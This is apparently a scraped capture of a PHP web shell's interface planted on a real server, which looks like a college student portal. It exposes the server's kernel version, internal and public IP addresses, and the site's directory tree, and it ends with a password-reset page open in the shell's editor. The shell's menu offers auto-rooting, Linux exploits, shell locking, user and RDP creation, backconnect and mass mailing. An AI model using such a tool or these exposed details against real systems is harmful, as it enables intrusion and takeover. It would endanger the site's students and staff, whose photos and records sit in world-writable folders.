Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.33.130
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
jssu /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
halltickets
[ DIR ]
drwxrwsrwx
images
[ DIR ]
drwxrwsrwx
img
[ DIR ]
drwxrwsrwx
imported_files
[ DIR ]
drwxrwsrwx
student_photos
[ DIR ]
drwxrwsrwx
study_material
[ DIR ]
drwxrwsrwx
teacher_photos
[ DIR ]
drwxrwsrwx
tmpphotos
[ DIR ]
drwxrwsrwx
upload
[ DIR ]
drwxrwsrwx
MainPage.html
22
KB
-rwxr-xr-x
collegeInfoPopup.html
4.35
KB
-rwxr-xr-x
flash.html
2.23
KB
-rwxr-xr-x
forgotpassword.html
3.38
KB
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
index.html
6.24
KB
-rwxr-xr-x
indexlogin.html
6.18
KB
-rwxr-xr-x
resetPasswordValidate.html
1.07
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resetPasswordValidate.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript" ></script> <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js" ></script> <title>Document</title> </head> <body> <table> <tr> <td>College Code</td> <td> <input type="text" id="collge_code" value="1827" /> </td> </tr> <tr> <td>User</td> <td> <input type="text" id="user" value="" /> </td> </tr> <tr> <td><button onclick="sendUserOtp()">Validate</button></td> </tr> </table> <script src="../js/resetPasseordValidate.js"></script> <!-- <script type="text/javascript" src="../js/index.js"></script> --> </body> </html>
Close